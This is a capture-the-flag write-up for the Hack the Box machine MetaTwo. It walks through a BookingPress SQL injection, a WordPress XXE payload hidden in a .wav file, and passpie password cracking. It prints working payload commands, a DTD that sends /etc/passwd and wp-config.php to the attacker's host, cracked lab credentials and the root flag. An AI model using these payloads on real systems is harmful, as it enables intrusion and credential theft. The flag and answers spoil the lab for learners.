MetaTwo
MetaTwo is an easy Linux machine from Hack the Box. Here is the tldr;
- There is a WordPress site with a vulnerable plugin called BookingPress that we can take advantage of to get a password and username for a WordPress user.
- Once we’re logged in, we’re able to upload media. There is a vulnerability in the version of wordpress on the box that lets us upload a malicious
.wavfile and download files from the server.- We are able to find a
wp-configfile on the server with credentials that allow us to ssh in as a user namedjnelson.- In
jnelsonshome directory is a hidden folder called.passpiewith a .pgp key and some encrypted messages. We’re able to crack the key withjohnand get the password forpasspie, which is a command line password manager.- We run
passpieand are able to export the password forroot.
Enumeration
nmap
Let’s start off with an nmap scan, looks like we have three ports open: 21, 22, 80.
1
2
3
4
5
6
7
8
9
10
11
12
┌──(dimondsec㉿hackbook)-[~/Documents/HTB/metatwo_2]
└─$ nmap 10.10.11.186
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 23:14 MST
Nmap scan report for metapress.htb (10.10.11.186)
Host is up (0.064s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 1.10 seconds
First thing I tried was logging into ftp as annonymous, but it looks like it’s not working. So let’s switch over to the web server. It doesn’t load but it does show us that the domain name is metapress.htb, so let’s add it to our /etc/hosts file.
The page does load, it looks like it’s running Wordpress. If we view the source code we can see that it’s running version 5.6.2.
We can also see there is an events page where you can schedule an event, it doesn’t look like a standard wordpress features so let’s see if we can find the name of the plugin being used. If you view the source you’ll be able to see that it is using the plugin called BookingPress 1.0.10. A quick google search shows that there is a known SQL injection vulnerability.
Foothold
After a quick google search, I found an exploit for the BookingPress plugin, there are a few others but this one was quick and worked well. To run it, we just need to provide it with the url and the nonce, which can be found by viewing the source code on the events page.
1
2
3
4
5
6
7
┌──(dimondsec㉿hackbook)-[~/Documents/HTB/metatwo]
└─$ python3 bp_exploit.py --url http://metapress.htb -n 690776adac
- BookingPress PoC
-- Got db fingerprint: 10.5.15-MariaDB-0+deb11u1
-- Count of users: 2
|admin|admin@metapress.htb|$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.|
|manager|manager@metapress.htb|$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70|
Just like that we have two usernames with their emails and password hashes. I put the admin hash in this online hash analyzer and it identified it as a MD5 Wordpress hash. Let’s run it through hashcat and see if we can crack the hash.
Crack the hash
1
2
3
4
5
6
┌──(dimondsec㉿hackbook)-[~/Documents/HTB/metatwo]
└─$ hashcat -O -m 400 -a 0 -o cracked.txt meta.hashes /usr/share/wordlists/rockyou.txt
┌──(dimondsec㉿hackbook)-[~/Documents/HTB/metatwo]
└─$ cat cracked.txt
$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70:partylikearockstar
I was not able to crack the admin password, but it did crack the password for manager right away. Let’s head on over to metapress.htb/wp-admin and see what we can do.
We are able to login, but it doesn’t seem like we have access to do very much. There is one interesting thing that cathces my eye right away though, we can upload new media. The first thing I did was try uploading .php and .phar files, but it looks like we are restricted on what kind of files we can upload.
XXE Vulnerability and exploit
We did find a wordpress version earlier (5.6.2), so let’s see where that takes us. A quick search led me to a blog post about a WordPress XXE vulnerability in Media Library. Sounds promising! Long story short, we need to create a malicious .wav file (a file type we are able to upload) that will send files from the server back a php server on our own machine.
Let’s start off by creating the .wav file that we’ll upload to WordPress.
1
2
┌──(dimondsec㉿hackbook)-[~/Documents/HTB/metatwo]
└─$ echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://10.10.14.4:7002/evil.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
We also need to create a DTD file to host on our machine and set up our php server. This attempt will hopefully send us the /etc/passwd file from the metapress.htb server to our server encoded in base64.
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.10.14.4:7001/?p=%file;'>" >
1
2
3
┌──(dimondsec㉿hackbook)-[~/Documents/HTB/metatwo_2/www]
└─$ php -S 0.0.0.0:7001
[Wed Mar 8 22:30:09 2023] PHP 8.1.12 Development Server (http://0.0.0.0:7001) started
Now we should be all set to upload our payload.wav file and see what happens!
1
2
3
4
5
6
7
8
9
┌──(dimondsec㉿hackbook)-[~/Documents/HTB/metatwo_2/www]
└─$ php -S 0.0.0.0:7001
[Wed Mar 8 22:30:09 2023] PHP 8.1.12 Development Server (http://0.0.0.0:7001) started
[Wed Mar 8 22:31:00 2023] 10.10.11.186:48716 Accepted
[Wed Mar 8 22:31:00 2023] 10.10.11.186:48716 [200]: GET /evil.dtd
[Wed Mar 8 22:31:00 2023] 10.10.11.186:48716 Closing
[Wed Mar 8 22:31:00 2023] 10.10.11.186:48722 Accepted
[Wed Mar 8 22:31:00 2023] 10.10.11.186:48722 [404]: GET /?p=cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbWFuOng6NjoxMjptYW46L3Zhci9jYWNoZS9tYW46L3Vzci9zYmluL25vbG9naW4KbHA6eDo3Ojc6bHA6L3Zhci9zcG9vbC9scGQ6L3Vzci9zYmluL25vbG9naW4KbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovdXNyL3NiaW4vbm9sb2dpbgpuZXdzOng6OTo5Om5ld3M6L3Zhci9zcG9vbC9uZXdzOi91c3Ivc2Jpbi9ub2xvZ2luCnV1Y3A6eDoxMDoxMDp1dWNwOi92YXIvc3Bvb2wvdXVjcDovdXNyL3NiaW4vbm9sb2dpbgpwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L3Vzci9zYmluL25vbG9naW4Kd3d3LWRhdGE6eDozMzozMzp3d3ctZGF0YTovdmFyL3d3dzovdXNyL3NiaW4vbm9sb2dpbgpiYWNrdXA6eDozNDozNDpiYWNrdXA6L3Zhci9iYWNrdXBzOi91c3Ivc2Jpbi9ub2xvZ2luCmxpc3Q6eDozODozODpNYWlsaW5nIExpc3QgTWFuYWdlcjovdmFyL2xpc3Q6L3Vzci9zYmluL25vbG9naW4KaXJjOng6Mzk6Mzk6aXJjZDovcnVuL2lyY2Q6L3Vzci9zYmluL25vbG9naW4KZ25hdHM6eDo0MTo0MTpHbmF0cyBCdWctUmVwb3J0aW5nIFN5c3RlbSAoYWRtaW4pOi92YXIvbGliL2duYXRzOi91c3Ivc2Jpbi9ub2xvZ2luCm5vYm9keTp4OjY1NTM0OjY1NTM0Om5vYm9keTovbm9uZXhpc3RlbnQ6L3Vzci9zYmluL25vbG9naW4KX2FwdDp4OjEwMDo2NTUzNDo6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtbmV0d29yazp4OjEwMToxMDI6c3lzdGVtZCBOZXR3b3JrIE1hbmFnZW1lbnQsLCw6L3J1bi9zeXN0ZW1kOi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtcmVzb2x2ZTp4OjEwMjoxMDM6c3lzdGVtZCBSZXNvbHZlciwsLDovcnVuL3N5c3RlbWQ6L3Vzci9zYmluL25vbG9naW4KbWVzc2FnZWJ1czp4OjEwMzoxMDk6Oi9ub25leGlzdGVudDovdXNyL3NiaW4vbm9sb2dpbgpzc2hkOng6MTA0OjY1NTM0OjovcnVuL3NzaGQ6L3Vzci9zYmluL25vbG9naW4Kam5lbHNvbjp4OjEwMDA6MTAwMDpqbmVsc29uLCwsOi9ob21lL2puZWxzb246L2Jpbi9iYXNoCnN5c3RlbWQtdGltZXN5bmM6eDo5OTk6OTk5OnN5c3RlbWQgVGltZSBTeW5jaHJvbml6YXRpb246LzovdXNyL3NiaW4vbm9sb2dpbgpzeXN0ZW1kLWNvcmVkdW1wOng6OTk4Ojk5ODpzeXN0ZW1kIENvcmUgRHVtcGVyOi86L3Vzci9zYmluL25vbG9naW4KbXlzcWw6eDoxMDU6MTExOk15U1FMIFNlcnZlciwsLDovbm9uZXhpc3RlbnQ6L2Jpbi9mYWxzZQpwcm9mdHBkOng6MTA2OjY1NTM0OjovcnVuL3Byb2Z0cGQ6L3Vzci9zYmluL25vbG9naW4KZnRwOng6MTA3OjY1NTM0Ojovc3J2L2Z0cDovdXNyL3NiaW4vbm9sb2dpbgo= - No such file or directory
[Wed Mar 8 22:31:00 2023] 10.10.11.186:48722 Closing
Success! Now let’s decode the base64 and grep for users that can login and we find root and jnelson. That might come in handy later, and now we know our attack is working.
1
2
3
4
┌──(dimondsec㉿hackbook)-[~/Documents/HTB/metatwo_2/www]
└─$ base64 -d passwd | grep sh$
root:x:0:0:root:/root:/bin/bash
jnelson:x:1000:1000:jnelson,,,:/home/jnelson:/bin/bash
Now that we are able to read files from the server, let’s see if we can find some more credentials. It is a WordPress site, so the wp-config.php file might be a good place to look. We don’t know the path to it yet, but we do know it’s running on nginx so let’s try this.
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/nginx/sites-enable/default">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.10.14.4:7001/?p=%file;'>" >
After uploading our payload again, we can decode the response and we can see our path to the wp-config.php file.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
──(dimondsec㉿hackbook)-[~/Documents/HTB/metatwo_2/www]
└─$ base64 -d nginx
server {
listen 80;
listen [::]:80;
root /var/www/metapress.htb/blog;
index index.php index.html;
if ($http_host != "metapress.htb") {
rewrite ^ http://metapress.htb/;
}
location / {
try_files $uri $uri/ /index.php?$args;
}
location ~ \.php$ {
include snippets/fastcgi-php.conf;
fastcgi_pass unix:/var/run/php/php8.0-fpm.sock;
}
location ~* \.(js|css|png|jpg|jpeg|gif|ico|svg)$ {
expires max;
log_not_found off;
}
}
Let’s update the evil.dtd file to get the /var/www/metapress.htb/blog/wp-config.php file. Once we decode it we get some new creds for the database and for the ftp server.
1
2
3
4
5
6
define( 'FS_METHOD', 'ftpext' );
define( 'FTP_USER', 'metapress.htb' );
define( 'FTP_PASS', '9NYS_ii@FyL_p5M2NvJ' );
define( 'FTP_HOST', 'ftp.metapress.htb' );
define( 'FTP_BASE', 'blog/' );
define( 'FTP_SSL', false );
ftp
After logging in to the ftp server, we see a directory called mailer with two files, one of them is called send_email.php with creds for our jnelson user.
1
2
3
4
5
6
$mail->Host = "mail.metapress.htb";
$mail->SMTPAuth = true;
$mail->Username = "jnelson@metapress.htb";
$mail->Password = "Cb4_JmWM8zUZWMu@Ys";
$mail->SMTPSecure = "tls";
$mail->Port = 587;
Let’s try ssh, and we’re in and are able to grab the user flag!
1
2
3
4
5
6
7
8
9
10
11
12
└─$ ssh jnelson@metapress.htb
jnelson@metapress.htb's password:
Linux meta2 5.10.0-19-amd64 #1 SMP Debian 5.10.149-2 (2022-10-21) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Oct 25 12:51:26 2022 from 10.10.14.23
jnelson@meta2:~$
Privesc
Let’s run linpeas and see what it can tell us. I started by downloading the latest build and spinning up a basic python server, then used wget to download linpeas.sh into the /dev/shm folder and running chmod +x on the script so that we can execute it. I originally tried putting it in /tmp, but there must be some kind of cleanup script running because it was deleted right away.
1
2
3
4
5
6
7
8
9
10
11
12
jnelson@meta2:/tmp$ wget http://10.10.14.4/linpeas.sh
--2023-03-09 06:18:38-- http://10.10.14.4/linpeas.sh
Connecting to 10.10.14.4:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 828098 (809K) [text/x-sh]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[==============================================================================>] 808.69K 1.64MB/s in 0.5s
2023-03-09 06:18:39 (1.64 MB/s) - ‘linpeas.sh’ saved [828098/828098]
jnelson@meta2:/tmp$ chmod +x linpeas.sh
passpie
After running it, the first thing that catches my is are these possible SSH keys in a hidden directory called ./passpie. With a little google searching we learn that passpie is a command line password manager. Sounds promising!
1
2
══╣ Possible private SSH keys were found!
/home/jnelson/.passpie/.keys
In the .passpie directory we two files .config, which is blank, and .keys which contains pgp public and private keys. In the ssh directory we find two more files jnelson.pass and root.pass. These files look like they contain encrypted passwords.
Let’s try cracking the private key. First we need to save just the private key portion and then use gpg2john to convert it to a format we can use with john.
1
2
3
4
┌──(dimondsec㉿hackbook)-[~/Documents/HTB/metatwo_2/pgp]
└─$ gpg2john pgp.priv > gpg.john
File pgp.priv
Then, let’s run it through john and we get the password blink182 for Passpie.
1
2
3
4
5
6
7
8
9
10
11
┌──(dimondsec㉿hackbook)-[~/Documents/HTB/metatwo_2/pgp]
└─$ john -w=/usr/share/wordlists/rockyou.txt for.john
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
No password hashes left to crack (see FAQ)
┌──(dimondsec㉿hackbook)-[~/Documents/HTB/metatwo_2/pgp]
└─$ john --show for.john
Passpie:blink182:::Passpie (Auto-generated by Passpie) <passpie@local>::pgp.priv
1 password hash cracked, 0 left
root!
In the github for passpie, we can see all of the commands we can run in passpie and looks like we can export the passwords by running passpie export passwords (note: passwords is just the name of the file you want to export the passwords into).
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
jnelson@meta2:~$ passpie export passwords
Passphrase:
jnelson@meta2:~$ ls
passwords user.txt
jnelson@meta2:~$ cat passwords
credentials:
- comment: ''
fullname: root@ssh
login: root
modified: 2022-06-26 08:58:15.621572
name: ssh
password: !!python/unicode 'p7qfAZt4_A1xo_0x'
- comment: ''
fullname: jnelson@ssh
login: jnelson
modified: 2022-06-26 08:58:15.514422
name: ssh
password: !!python/unicode 'Cb4_JmWM8zUZWMu@Ys'
handler: passpie
version: 1.0
Simply su to root, enter in the password and we’re in!
1
2
3
4
5
6
jnelson@meta2:~$ su root
Password:
root@meta2:/home/jnelson# cd /root
root@meta2:~# cat root.txt
a1527462a13eb47b516c1375a2e7d218
root@meta2:~#